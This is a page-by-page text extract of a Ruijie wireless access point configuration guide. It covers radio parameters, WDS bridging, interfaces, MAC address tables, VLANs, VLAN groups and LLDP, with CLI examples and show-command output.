  • Page 201 Configuration Guide Configuring FAT APs  Configuring the Minimum Value of RSSI for STA Access  Optional.  If there are no special requirementsIf there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment. ...
  • Page 202 Configuration Guide Configuring FAT APs Description Defaults The transmit power for management frames is 0, which indicates that no transmit power is configured for management frames. Command dot11radio interface configuration mode Mode Usage Guide  Configuring the STA Idle Time ...
  • Page 203 Configuration Guide Configuring FAT APs  If there are no special requirementsIf there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.  Packets from upper layers or some large management frames must be fragmented before they can be transmitted on wireless channels.
  • Page 204 Configuration Guide Configuring FAT APs Parameter milliseconds: indicates the beacon frame period, ranging from 20 to 1000 in the unit of ms. Description Defaults The beacon frame period is 100 milliseconds. Command dot11radio interface configuration mode Mode Usage Guide  Configuring Enabling/Disabling of the Short Preamble ...
  • Page 205 Configuration Guide Configuring FAT APs  The higher the channel bandwidth, the more channel bandwidth available to STAs, but the fewer the channels that can be configured, and the higher the probability of interference between neighboring channels. Command chan-width { 20 | 40 | 80 } Parameter 20: sets the channel bandwidth to 20 MHz.
  • Page 206 Configuration Guide Configuring FAT APs Mode Usage Guide  Configuring the Country Code  Optional.  If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.  A country code is used to identify a country where radio frequencies reside. The bands, channels, and power vary with country codes.
  • Page 207 Configuration Guide Configuring FAT APs  An AP uses different quantities of antennas for data transmitting. In this way, the AP can transmit signals in the double spatial stream mode or three spatial stream mode over 802.11n, thus improving the data transmission performance of the AP.

  • Page 208: Scenario

    Configuration Guide Configuring FAT APs Usage Guide This configuration is not supported for all APs. This configuration needs to be performed only when the longest distance between an AP and the wireless transmission peer is greater than 1000 m. The configured distance may be longer, but cannot be shorter than the actual distance.
  • Page 209 Ruijie#config Ruijie(config)#interface Dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)#beacon dtim-period 3 Ruijie(config-if-Dot11radio 1/0)#apsd enable Ruijie(config-if-Dot11radio 1/0)#ampdu enable Ruijie(config-if-Dot11radio 1/0)#rate-set 11a mandatory 24 Ruijie(config-if-Dot11radio 1/0)#rate-set 11a support 54 Ruijie(config-if-Dot11radio 1/0)#rate-set 11b disable 1 Ruijie(config-if-Dot11radio 1/0)#rate-set 11b disable 2 Ruijie(config-if-Dot11radio 1/0)#rate-set 11g disable 1 Ruijie(config-if-Dot11radio 1/0)#rate-set 11g disable 2...
  • Page 210 After the user configures RF parameters, verify the dot11radio interface based on displayed dot11radio interface configurations.  Run the show running-config command to check the configurations of the dot11radio interface. Ruijie#show running-config interface Dot11radio 1/0 ip proxy-arp rate-set 11b mandatory 5 11...
  • Page 211 Configuration Guide Configuring FAT APs 1.4.4 Configuring E-bag Parameters Configuration Effect  Configure the e-bag parameters of an AP and associated RF interfaces to facilitate configuration and management by an administrator. Notes  Configuration Steps  Configuring the Number of AMPDU Software Re-transmission Times ...

  • Page 212: Scenario

    Configuration Guide Configuring FAT APs  Configuring the Number of Ethernet Packets That Can Be Received by an AP at a Time.  (Optional) The default value varies with APs.  If there are no special requirements, you can perform this configuration in the global configuration mode of the AP equipment.

  • Page 213: Scenario

    Configuration Guide Configuring FAT APs Description Command dot11radio interface configuration mode Mode Usage Guide  Configuring E-bag Network Optimization by Using the One-Key Mode  (Optional) There is no default configuration.  If there are no special requirements, you can perform this configuration in the global configuration mode of the AP equipment.

  • Page 214: Scenario

    Configuration  Configure e-bag parameters on the AP as follows: Steps FAT AP Ruijie# configure terminal Ruijie(config)# eth-schd 100 Ruijie(config)# interface dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)# ampdu-retries 3 Ruijie(config-if-Dot11radio 1/0)# ampdu-rts Ruijie(config-if-Dot11radio 1/0)# no ldpc Ruijie(config-if-Dot11radio 1/0)# no stbc Verification ...

  • Page 215: Scenario

    Configuration  Configure e-bag parameters on the AP as follows: Steps FAT AP Ruijie# configure terminal Ruijie(config)# eth-schd 100 Ruijie(config)# interface dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)# ampdu-retries 3 Ruijie(config-if-Dot11radio 1/0)# ampdu-rts Ruijie(config-if-Dot11radio 1/0)# no ldpc Ruijie(config-if-Dot11radio 1/0)# no stbc Verification ...

  • Page 216: Scenario

    Configuration  configure e-bag parameters on an AP: Steps FAT AP Ruijie# configure terminal Ruijie(config)# ebag Verification  Run the show running-config command to check the e-bag parameter settings on a specified AP. Ruijie(config)# show running-config...

  • Page 217: Scenario

    Configuration Guide Configuring FAT APs  Enable the link integrity check function. Notes  Configuration Steps  Enabling the Link Integrity Check Function  (Mandatory) Run the link-check enable command to enable the link integrity check function. Command link-check enable Parameter Description Command...
  • Page 218 Configuration Guide Configuring FAT APs FAT AP Ruijie# configure terminal Ruijie(config)# link-check enable Verification  Run the show running-config command to check the configuration. Ruijie(config)# show running-config …… link-check enable …… Common Errors  1.4.6 Configuring a WLAN by Using the One-Key Mode Configuration Effect ...

  • Page 219: Scenario

    FAT APIf one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps Ruijie# configure terminal FAT AP Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration.

  • Page 220: Scenario

    FAT APIf one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration. dns-server 8.8.8.8 default-router 192.168.110.1...

  • Page 221: Rate-Set 11B Mandatory 5

    Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration. interface GigabitEthernet 0/1 encapsulation dot1Q 1...

  • Page 222: Rate-Set 11N Mcs-Support

    Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration. station-role root-ap interface Dot11radio 2/0...

  • Page 223: Scenario

    Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration. interface BVI 1 ip address 192.168.110.1 255.255.255.0...

  • Page 224: Scenario

    FAT APIf one-key WLAN configuration needs to be performed on the AP equipment in a FAT AP environment, then: Configuration  commands to perform one-key WLAN configuration on the AP equipment: Steps FAT AP Ruijie# configure terminal Ruijie(config)# autowifi Verification  Run the show running-config command to check the one-key WLAN configuration. 1.5 Monitoring Displaying...

  • Page 225: Channel

    Configuration Guide Configuring FAT APs Displays the rate sets of all RF interfaces. show dot11 rate-set Displays radio information show dot11 wlan wlan-id configurations of a WLAN. Displays a working channel supported by a show dot11 channels active interface-name WNIC. Displays all working channels supported by show dot11 channels all interface-name a WNIC.

  • Page 226: Configuring Wds

    Configuration Guide Configuring WDS 2 Configuring WDS 2.1 Overview Wireless Distribution System (WDS) is a system enabling interconnection of multiple access points (APs) in wireless bridging or relay mode to interconnect distributed networks and spread wireless signals. WDS has two working modes: Root Bridge and Non-root Bridge. ...
  • Page 227 Configuration Guide Configuring WDS 2.3.1 Establishing WDS Bridging Establish WDS bridging. Working Principle Each AP is a Basic Service Set (BSS). Each has a BSSID (which is usually the MAC address of an AP). An AP regularly broadcasts Beacon frames with the SSID (name of the WLAN) and BSSID, and wireless stations (STAs) listen to the Beacon frames by scanning.
  • Page 228 Configuration Guide Configuring WDS three-address format is changed to a four-address format, with the MAC addresses of AP 2, AP 1, STA 3 and STA 1 filled (see Figure 2-2). After receiving the frame, AP 1 forwards it to STA 3 and changes the four-address format back to a three-address format.
  • Page 229 Configuration Guide Configuring WDS 2.4.1 Configuring WDS Basic Functions Configuration Effect  Configure WDS bridging. Notes  In WDS application environments, the Multiple Spanning Tree Protocol (MSTP) function must be enabled to prevent potential network loops.  Meanwhile, the Address Resolution Protocol (ARP) agent must be disabled. ...
  • Page 230 Configuration Guide Configuring WDS Parameter Description Defaults APs are not working in the bridging mode. Command Interface configuration mode Mode Usage Guide  Specifying a Root Bridge for a Non-root Bridge  Mandatory.  Configure bridge coverage on APs for fat APs. ...
  • Page 231 Configuration Guide Configuring WDS It is recommended to disable bridge coverage. Usage Guide  Pre-configuring a Fit Non-root Bridge  Optional.  When a non-root bridge needs to work in fit AP mode, the pre-configuration must be conducted on fat APs. ...
  • Page 232 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 Access Service Configuration 1. Configuring Interface 2. Configuring MAC Address 3. Configuring VLAN 4. Configuring VLAN Group 5. Configuring LLDP 6. Configuring PPPoE Client...

  • Page 233: Scenario

    1 Configuring Interfaces 1.1 Overview Interfaces are important parts for data exchange on network devices. Ruijie Networks devices support two types of interfaces: physical interfaces and logical interfaces. A physical interface is a real entity that exists on a device, for example, FastEthernet (FE) or GigabitEthernet (GE) interface.
  • Page 234 Run ping 192.168.2.2 and ping 192.168.1.1 respectively on Router A and Router C to achieve route-based communication on Router B. 1.3 Features Basic Concepts  Interface Types Interfaces on Ruijie Networks AP devices are classified into two categories:  Local Area Network (LAN) interface  Logical interface Common LAN interfaces fall into the following types: ...
  • Page 235 Configuration Guide Configuring Interfaces requests, or the network interface ID for remote Telnet access. The procedure of configuring a loopback interface is similar to that of configuring an Ethernet interface. You can regard a loopback interface as a virtual Ethernet interface. ...
  • Page 236 Configuration Guide Configuring Interfaces Feature Description Specifying the Medium Type If an interface is a Small Form-factor Pluggable (SFP) combo interface, you can choose to use the optical interface or the copper port based on your needs. Enabling Module If interface rate auto-negotiation is enabled, the interface rate can be automatically adjusted Auto-Detection based on the type of the inserted module.
  • Page 237 Configuration Guide Configuring Interfaces The types of interfaces of all ranges specified in one command must be the same. Pay attention to the format of the range parameter when you run the interface range command. The following common interface range formats are valid: ...
  • Page 238 Configuration Guide Configuring Interfaces  Configuring a Tunnel Interface No tunnel interface is created by default. You can run the interface tunnel tunnel-number command in global configuration mode to create a tunnel interface. The value of tunnel-number ranges from 1 to the maximum number of tunnel interfaces supported by a device. After a tunnel interface is successfully created, enter the interface configuration mode of this tunnel interface.
  • Page 239 Configuration Guide Configuring Interfaces Working Principle When exchanging a great throughput of data, an interface may receive jumbo frames whose size is larger than that of typical Ethernet frames. MTU is the size of a valid data segment of a frame. It does not include the overhead of Ethernet encapsulation.
  • Page 240 You can run the bandwidth kilobits command in interface configuration mode to set the interface bandwidth. kilobits indicates the bandwidth per second, in the unit of Kbps. It ranges from 1 to the maximum Ethernet rate supported by Ruijie devices. For 40GE physical interfaces with the maximum rate capability, the maximum bandwidth is 40,000,000. You can run the no bandwidth command to restore the default value.
  • Page 241 Configuration Guide Configuring Interfaces 1.3.8 Configuring the Carrier Delay Working Principle The carrier delay refers to the acceptable time delay in status change of the Data Carrier Detect (DCD) signal from Down to Up or from Up to Down. If the DCD status changes within the delay, the system will ignore this change and the upper data link layer does not need to renegotiate.
  • Page 242 Configuration Guide Configuring Interfaces Related Configuration  Configuring the 802.1Q VLAN Tag By default, the 802.1Q encapsulation protocol is disabled for interfaces. You can run the encapsulation dot1Q VlanID command in interface configuration mode to encapsulate 802.1Q on an interface. VlanID is the VLAN ID to be encapsulated. 1.3.10 Configuring the Rate and Duplex Mode You can configure the rate and duplex mode of an Ethernet interface and AP.
  • Page 243 Configuration Guide Configuring Interfaces 1.3.11 Enabling Module Auto-Detection If an interface works in auto-negotiation mode, the interface rate can be automatically adjusted based on the detected type of the inserted module. Working Principle Currently, two types of modules are supported: SFP (Gigabit) and SFP+ (10 Gigabit). If an SFP module is inserted, the interface works in Gigabit mode.
  • Page 244 Configuration Guide Configuring Interfaces Configuration Description and Command Attributes Configures the interface bandwidth in interface bandwidth configuration mode. Configures the carrier delay of an interface in carrier-delay interface configuration mode. Configures the load calculation interval of an load-interval interface in interface configuration mode. Configures the duplex mode of an interface.
  • Page 245 Configuration Guide Configuring Interfaces  (Optional) To configure this function, run the interface range command.  Run this command in global configuration mode.  To create non-existing logical interfaces in batches or configure multiple existing physical or logical interfaces in interface configuration mode, run this command.
  • Page 246 Configuration Guide Configuring Interfaces  Configuring Interfaces Within a Specific Range  If you can properly enter the interface configuration mode after running the interface range command, the configuration is successful.  After running the no interface range command on a logical interface, you can also run the show running command to check whether the interface exists.
  • Page 247 Configuration Guide Configuring Interfaces  Run the no form of this command to delete a specified logical interface.  Run the default form of this command to restore the default configurations in interface configuration mode.  Configuring Interfaces Within a Specific Range Command interface range { port-range | macro macro_name } Parameter...

  • Page 248: Scenario

    Configuration Guide Configuring Interfaces  Configuring the Interface Description Command description string Parameter string: Indicates the interface description. Description Command Interface configuration mode Mode Run this command to enter the interface configuration mode and then modify the interface configurations. Usage Guide ...
  • Page 249 Configuration Guide Configuring Interfaces A(config-if-GigabitEthernet 0/1)# snmp trap link-status A(config-if-GigabitEthernet 0/1)# shutdown A(config-if-GigabitEthernet 0/1)# end A# write B# configure terminal B(config)# snmp-server if-index persist B(config)# interface gigabitethernet 0/1 B(config-if-GigabitEthernet 0/1)# ip address 192.168.1.2 255.255.255.0 B(config-if-GigabitEthernet 0/1)# snmp trap link-status B(config-if-GigabitEthernet 0/1)# shutdown B(config-if-GigabitEthernet 0/1)# end B# write Perform the following operations on Router A and Router B respectively:...
  • Page 250 Configuration Guide Configuring Interfaces Rxload is 1/255, Txload is 1/255 Ethernet attributes: Medium-type is Copper Last link state change time: 2013-12-20 13:55:20 Time duration since last link state change: 5 days, 5 hours, 17 minutes, 36 seconds Priority is 0 admin duplex mode is AUTO, oper duplex is Unknown admin speed is AUTO, oper speed is Unknown Rxload is 1/255, Txload is 1/255...
  • Page 251 Configuration Guide Configuring Interfaces Medium-type is Copper Last link state change time: 2013-12-20 13:55:20 Time duration since last link state change: 5 days, 5 hours, 17 minutes, 36 seconds Priority is 0 admin duplex mode is AUTO, oper duplex is Unknown admin speed is AUTO, oper speed is Unknown Rxload is 1/255, Txload is 1/255 10 seconds input rate 0 bits/sec, 0 packets/sec...
  • Page 252 Configuration Guide Configuring Interfaces  Configuring the MTU  (Optional) If this function is required, run the mtu command in interface configuration mode.  Generally, the default MTU of an interface is 1,500 bytes.  Configuring the Bandwidth  (Optional) If this function is required, run the bandwidth command in interface configuration mode. ...
  • Page 253 Usage Guide  Configuring the Bandwidth Command bandwidth kilobits Parameter kilobits: Indicates the interface bandwidth, ranging from 1 to the maximum Ethernet rate supported by Ruijie devices in the unit of Kbps. Description Command Interface configuration mode Mode Usage Guide...

  • Page 254: Scenario

    Configuration Guide Configuring Interfaces  Configuring the 802.1Q VLAN Tag Command encapsulation dot1Q VlanID Parameter VlanID: Indicates VLAN ID ranging from 1 to 4094. Description Command Interface configuration mode Mode Usage Guide Configuration Example  Configuring Interface Attributes Scenario Figure 1-3 ...
  • Page 255 Configuration Guide Configuring Interfaces RA(config-if)# encapsulation dot1Q 2 RA(config-if)# ip address 192.168.1.1 255.255.255.0 RA(config-if)# exit RA(config)# interface Serial 1/0 RA(config-if)# encapsulation frame-relay RA(config-if)# ip address 172.16.1.1 255.255.255.0 RA(config-if)# exit RA(config)# router rip RA(config-router)# network 192.168.1.0 RA(config-router)# network 17.16.1.0 RA(config-router)# exit Router B RB# configure terminal RB(config)# interface GigabitEthernet 0/1.1...
  • Page 256 Configuration Guide Configuring Interfaces SB(config)# ip route 0.0.0.0 255.255.255.0 VLAN 1 192.168.2.1 Perform the following operations on Switch A, Switch B, Router A, and Router B respectively : Verification  Enable Switch A to ping the IP addresses of the other three devices and ensure that the four devices can have access to each other.
  • Page 257 Configuration Guide Configuring Interfaces admin speed is AUTO, oper speed is 100M flow control admin status is OFF, flow control oper status is OFF admin negotiation mode is OFF, oper negotiation state is ON Storm Control: Broadcast is OFF, Multicast is OFF, Unicast is OFF Port-type: trunk Native vlan: 1 Allowed vlan lists: 1-4094...
  • Page 258 Configuration Guide Configuring Interfaces No IPv6 address MTU 1500 bytes, BW 2000 Kbit Encapsulation protocol is frame-relay, loopback not set Keepalive interval is 10 sec , set Carrier delay is 2 sec Queueing strategy: WFQ Rxload is 1/255,Txload is 1/255 5 minutes input rate 0 bits/sec, 0 packets/sec 5 minutes output rate 0 bits/sec, 0 packets/sec 235 packets input, 434532 bytes, 0 no buffer...
  • Page 259 Configuration Guide Configuring Interfaces MTU 1500 bytes, BW 2000 Kbit Encapsulation protocol is frame-relay, loopback not set Keepalive interval is 10 sec , set Carrier delay is 2 sec Queueing strategy: WFQ Rxload is 1/255,Txload is 1/255 5 minutes input rate 0 bits/sec, 0 packets/sec 5 minutes output rate 0 bits/sec, 0 packets/sec 235 packets input, 434532 bytes, 0 no buffer Received 0 broadcasts, 0 runts, 0 giants...
  • Page 260 Configuration Guide Configuring Interfaces 85164 Switchport attributes: interface's description:"" admin medium-type is Copper, oper medium-type is Copper lastchange time:0 Day: 0 Hour: 1 Minute: 9 Second Priority is 0 admin duplex mode is AUTO, oper duplex is Full admin speed is AUTO, oper speed is 100M flow control admin status is OFF, flow control oper status is OFF admin negotiation mode is OFF, oper negotiation state is ON Storm Control: Broadcast is OFF, Multicast is OFF, Unicast is OFF...
  • Page 261 Configuration Guide Configuring Interfaces Restarts an interface. clear interface interface-type interface-number Displaying  Displaying Interface Configuration and Status Description Command Displays the status and configuration show interfaces [ interface-type interface-number ] of an interface. Displays the time and times of link show interfaces [ interface-type interface-number ] link-state-change statistics status changes.

  • Page 262: Scenario

    Configuration Guide Configuring MAC Address 2 Configuring MAC Address 2.1 Overview A MAC address table contains the MAC addresses, interface numbers and VLAN IDs of the devices connected to the local device. When a device forwards a packet, it finds an output port from its MAC address table according to the destination MAC address and the VLAN ID of the packet.
  • Page 263 Configuration Guide Configuring MAC Address Figure 2-1 Step 1 of MAC Address Learning Figure 2-2 MAC Address Table 1 Status VLAN MAC address Interface Dynamic 00d0.f8a6.5af7 GigabitEthernet 0/2 When User B receives the packet, it sends a reply packet to User A through port GigabitEthernet 0/3 on the switch. As the MAC address of User A is already in the MAC address table, the switch send the reply unicast packet to port GigabitEthernet 0/2 port and learns the MAC address of User B.

  • Page 264: Scenario

    Configuration Guide Configuring MAC Address 2.2.2 MAC Address Change Notification MAC address change notification provides a mechanism for the network management system (NMS) to monitor the change of devices connected to a network device. Scenario Figure 2-5 MAC Address Change Notification After MAC address change notification is enabled on a device, the device generates a notification message when the device learns a new MAC address or finishes aging a learned MAC address, and sends the message in an SNMP Trap message to a specified NMS.
  • Page 265 Configuration Guide Configuring MAC Address A device only learns a limited number of MAC addresses, and inactive entries are deleted through address aging. A device starts aging a MAC address when it learns it. If the device receives no packet containing the source MAC address, it will delete the MAC address from the MAC address table when the time expires.
  • Page 266 Specifies a physical interface or an AP port. vlan vlan-id: Displays the dynamic MAC addresses in a specific VLAN. Command Privileged EXEC mode/Global configuration mode/Interface configuration mode Mode Usage Guide Ruijie# show mac-address-table dynamic Vlan MAC Address Type Interface ----...

  • Page 267: Scenario

     Steps Delete all dynamic MAC addresses in VLAN 1 on port GigabitEthernet 0/1. Ruijie# configure terminal Ruijie(config)# mac aging-time 180 Ruijie# clear mac-address-table dynamic interface GigabitEthernet 0/1 vlan 1  Verification Check MAC address learning on an interface. ...
  • Page 268 Configuration Guide Configuring MAC Address Ruijie# show mac aging-time Aging time 180 seconds Ruijie# show mac-address-table dynamic interface GigabitEthernet 0/1 vlan 1 Vlan MAC Address Type Interface ---------- -------------------- -------- ------------------- 00d0.f800.1001 STATIC GigabitEthernet 1/1 Common Errors Configure MAC address learning on an interface before configuring the interface as a layer-2 interface, for example, a switch port or an AP port.

  • Page 269: Scenario

    Configuration Guide Configuring MAC Address Mode Usage Guide Ruijie# show mac-address-table static Vlan MAC Address Type Interface ----- ----------- -------- ------------------ 00d0.f800.1001 STATIC GigabitEthernet 1/1 00d0.f800.1002 STATIC GigabitEthernet 1/1 00d0.f800.1003 STATIC GigabitEthernet 1/1 Configuration Example  Configuring a Static MAC address In the above example, the relationship of MAC addresses, VLAN and interfaces is shown in the following table.
  • Page 270 Configuration Guide Configuring MAC Address Display the static MAC address configuration on a switch. Verification A# show mac-address-table static Vlan MAC Address Type Interface ---------- -------------------- -------- ------------------- 00d0.f800.3232.0001 STATIC GigabitEthernet 0/10 00d0.f800.3232.0002 STATIC GigabitEthernet 0/11 00d0.f800.3232.1000 STATIC GigabitEthernet 0/12 Common Errors ...
  • Page 271 Specify a destination MAC address (mac-address) for filtering.  Steps Specify a VLAN where the MAC addresses resides. Ruijie# configure terminal Ruijie(config)# mac-address-table static 00d0.f800.3232.0001 vlan 1 Verification Display the filtered MAC address configuration. Ruijie# show mac-address-table filter Vlan MAC Address...
  • Page 272 Configuration Guide Configuring MAC Address community-string: Indicates an authentication name. Defaults By default, the function is disabled. Command Global configuration mode Mode Usage Guide  Enabling SNMP Trap  Optional.  Perform this configuration to send SNMP Trap messages. Command snmp-server enable traps Parameter Description...
  • Page 273 Command Privileged EXEC mode/Global configuration mode /Interface configuration mode Mode Usage Guide Usage Guide Display the configuration of global MAC address change notification. Ruijie#show mac-address-table notification MAC Notification Feature : Enabled Interval(Sec): Maximum History Size : Current History Size :...

  • Page 274: Scenario

    Configure the interval for sending MAC address change notifications to 300 seconds (1 second by default). Ruijie# configure terminal Ruijie(config)# mac-address-table notification Ruijie(config)# interface gigabitEthernet 0/2 Ruijie(config-if-GigabitEthernet 0/2)# snmp trap mac-notification added Ruijie(config-if-GigabitEthernet 0/2)# snmp trap mac-notification removed Ruijie(config-if-GigabitEthernet 0/2)# exit Ruijie(config)# snmp-server host 192.168.1.10 traps version 2c comefrom2 Ruijie(config)# snmp-server enable traps...
  • Page 275 Display the history of MAC address change notifications. Ruijie# show mac-address-table notification MAC Notification Feature : Enabled Interval(Sec): Maximum History Size : Current History Size : Ruijie# show mac-address-table notification interface GigabitEthernet 0/2 Interface MAC Added Trap MAC Removed Trap ----------- -------------- --------------...
  • Page 276 Configuration Guide Configuring MAC Address 2.5 Monitoring Clearing Running the clear commands may lose vital information and interrupt services. Description Command Clears dynamic MAC addresses. clear mac-address-table dynamic [ address mac-address ] [ interface interface-id ] [ vlan vlan-id ] Displaying Description Command...

  • Page 277: Configuring Vlan

    Unicast, broadcast and multicast frames of Layer 2 are forwarded and transmitted within a VLAN, keeping traffic segregated. The VLANs supported by Ruijie products comply with the IEEE802.1Q standard. A maximum of 4094 VLANs (VLAN ID 1-4094) are supported, among which VLAN 1 cannot be deleted.
  • Page 278 Configuration Guide Configuring VLAN 3.4 Configuration Configuration Description and Command (Mandatory) It is used to create a VLAN. vlan Enters a VLAN ID. Configuring Basic VLAN (Optional) It is used to rename a VLAN. name Names a VLAN. 3.4.1 Configuring Basic VLAN Configuration Effect ...
  • Page 279 [ id vlan-id ] Parameter vlan-id : indicates a VLAN ID. Description Command Any mode Mode Usage Guide Command Ruijie(config-vlan)#show vlan id 20 Display VLAN Name Status Ports ---- -------------------------------- --------- ----------------------------------- 20 VLAN0020 STATIC Gi0/1 Configuration Example ...
  • Page 280 Configuration Guide Configuring VLAN VLAN Name Status Ports ---- -------------------------------- --------- ----------------------------------- 1 VLAN0001 STATIC 20 VLAN0020 STATIC Gi0/3 888 test888 STATIC 3.5 Monitoring Displaying Description Command Displays VLAN configuration. show vlan Debugging System resources are occupied when debugging information is output. Disable the debugging switch immediately after use.
  • Page 281 Configuration Guide Configuring VLAN Group 4 Configuring VLAN Group 4.1 Overview Each virtual LAN (VLAN) group contains multiple VLANs. VLAN group function associates a wireless LAN (WLAN) with a VLAN group, achieving 1:N mapping between them, which assigns VLANs flexibly to WLAN-accessed stations (STAs). The VLAN assignment mode js below: ...
  • Page 282 Configuration Guide Configuring VLAN Group The STA will be authenticated in the default VLAN. After authentication succeeds, the authentication server determines whether to assign a VLAN. If yes, the packets subsequently sent by the STA will be automatically redirected to the assigned VLAN.
  • Page 283 Configuration Guide Configuring VLAN Group  Configuring a VLAN List for a VLAN Group  Mandatory. Ensure that VLANs have been created. Command vlan-list vlan-list Parameter vlan-list: indicates a VLAN list, containing a maximum of 128 VLANs. Description Defaults No VLAN list is configured. Command VLAN group configuration mode Mode...
  • Page 284 Set the VLAN assignment mode to 802.1X-based mode.  Configure a VLAN list that contains VLAN 1 to VLAN 10.  Set the default VLAN to VLAN 1. Ruijie# configure terminal Ruijie(config)# vlan-group 10 Ruijie(config-vlan-group)# vlan-assign-mode dot1x Ruijie(config-vlan-group)# vlan-list 1-10 Ruijie(config-vlan-group)# default-vlan 1 Ruijie(config-vlan-group)# end ...
  • Page 285 Configure the VLAN group encapsulation for wireless sub interfaces. Ruijie(config)# dot11 wlan 100 Ruijie(dot11-wlan-config)# vlan-group-id 100 Ruijie(dot11-wlan-config)# end Ruijie(config)# interface dot11radio 1/0.1 Ruijie(config-subif)# encapsulation dot1Q group 10 Ruijie(config-subif)# end Ruijie(config)# interface dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)# wlan-id 100 4.5 Monitoring Clearing...
  • Page 286 Configuration Guide Configuring VLAN Group Displaying Description Command Displays VLAN group show vlan-group [ group-id ] information. Debugging System resources are occupied when debugging information is output. Therefore, disable the debugging switch immediately after use. Description Command Debugs the VLAN group status. debug bridge vgoup...

  • Page 287: Scenario

    Administrators can quickly locate and rectify a fault based on the information. A Ruijie LLDP-compliant device is capable of discovering neighbors when the peer is either of the following: ...

  • Page 288: Scenario

    Configuring LLDP Figure 5-1 Remarks Ruijie Switch A, Switch B, and IP-Phone support LLDP and LLDP-MED. LLDP on switch ports works in TxRx mode. The LLDP transmission interval is 30 seconds and transmission delay is 2 seconds by default. Deployment ...
  • Page 289 Configuration Guide Configuring LLDP 5.3 Features Basic Concepts  LLDPDU LLDPDU is a protocol data unit encapsulated into an LLDP packet. Each LLDPDU is a sequence of TLV structures. The TLV collection consists of three mandatory TLVs, a series of optional TLVs, and one End Of TLV. The following figure shows the format of an LLDPDU.
  • Page 290 Describes main functions of the device, such as the bridge, System Capabilities TLV Optional routing, and relay functions. Indicates the management address, which contains the interface Management Address TLV Optional ID and object identifier (OID). Ruijie LLDP-compliant switches support advertisement of basic management TLVs. Organizationally specific TLVs...
  • Page 291 Indicates the VLAN name of a port. Protocol Identity TLV Indicates the protocol type supported by a port. Ruijie LLDP-compliant switches do not send the Protocol Identity TLV but receive this TLV.  IEEE 802.3 organizationally specific TLVs The following table describes IEEE 802.3 organizationally specific TLVs.
  • Page 292 Indicates the module name of the MED device. Indicates the asset identifier of the MED device, used for inventory management Inventory – Asset ID TLV and asset tracking. Ruijie LLDP-compliant Ruijie devices support advertisement of LLDP-MED TLVs. Overview Feature Description LLDP Work Mode Configures the mode of transmitting and receiving LLDP packets.
  • Page 293 Configuration Guide Configuring LLDP If the work mode is set to TxRx, the device can both transmit and receive LLDP packets. If the work mode is set to Rx Only, the device can only receive LLDP packets. If the work mode is set to Tx Only, the device can only transmit LLDP packets. If the work mode is disabled, the device cannot transmit or receive LLDP packets.
  • Page 294 Configuration Guide Configuring LLDP The default LLDP transmission interval is 30 seconds. Run the lldp timer tx-interval command to change the LLDP transmission interval. If the interval is set to a very small value, LLDP packets may be transmitted frequently. If the interval is set to a very large value, the peer may not discover the local device in time.
  • Page 295 Configuration Guide Configuring LLDP 5.4 Configuration Configuration Description and Command (Optional) It is used to enable or disable the LLDP function in global or interface Configuring LLDP configuration mode. Function lldp enable Enables the LLDP function. no lldp enable Disables the LLDP function. (Optional) It is used to configure the LLDP work mode.
  • Page 296 Configuration Guide Configuring LLDP Configuration Description and Command no lldp timer reinit-delay Restores the default initialization delay. (Optional) It is used to configure the LLDP Trap function. Enables the LLDP Trap function. lldp notification remote-change enable no lldp notification remote-change enable Disables the LLDP Trap function.
  • Page 297 Configuration Guide Configuring LLDP Configuration Description and Command no { country | state | county | city | division neighborhood street-group leading-street-dir | trailing-street-suffix | street-suffix number Deletes civic address of a device. street-number-suffix landmark additional-location-information | name | postal-code | building | unit | floor | room | type-of-place | postal-community-name | post-office-box | additional-code } ca-word (Optional) It is used to configure the emergency telephone number of a device.
  • Page 298 Usage Guide Configuration Example  Disabling the LLDP Function  Configuration Disable the LLDP function in global configuration mode. Steps Ruijie(config)#no lldp enable  Display global LLDP status. Verification Ruijie(config)#show lldp status Global status of LLDP: Disable Common Errors ...
  • Page 299 Configuration Guide Configuring LLDP  If you disable the LLDP work mode, the interface can neither receive nor transmit packets. Notes  LLDP runs on physical ports (AP member ports for AP ports). Stacked ports and VSL ports do not support LLDP. Configuration Steps ...
  • Page 300 Configuration Guide Configuring LLDP Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp mode tx Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation...
  • Page 301 Configuration Guide Configuring LLDP Configuration Steps  Optional.  Configure the type of TLVs to be advertised on an interface. Verification Display the configuration of TLVs to be advertised on an interface  Check whether the configuration takes effect. Related Commands ...
  • Page 302 Configuration Guide Configuring LLDP network-policy: Indicates the Network Policy TLV. profile-num: Indicates the Network Policy ID, ranging from 1 to 1,024. power-over-ethernet: Indicates the Extended Power-via-MDI TLV. Command Interface configuration mode Mode Usage Guide  Canceling TLVs Command no lldp tlv-enable {basic-tlv { all | port-description | system-capability | system-description | system-name } | dot1-tlv { all | port-vlan-id | protocol-vlan-id | vlan-name } | dot3-tlv { all | link-aggregation | mac-physic | max-frame-size | power } | med-tlv { all | capability | inventory | location...
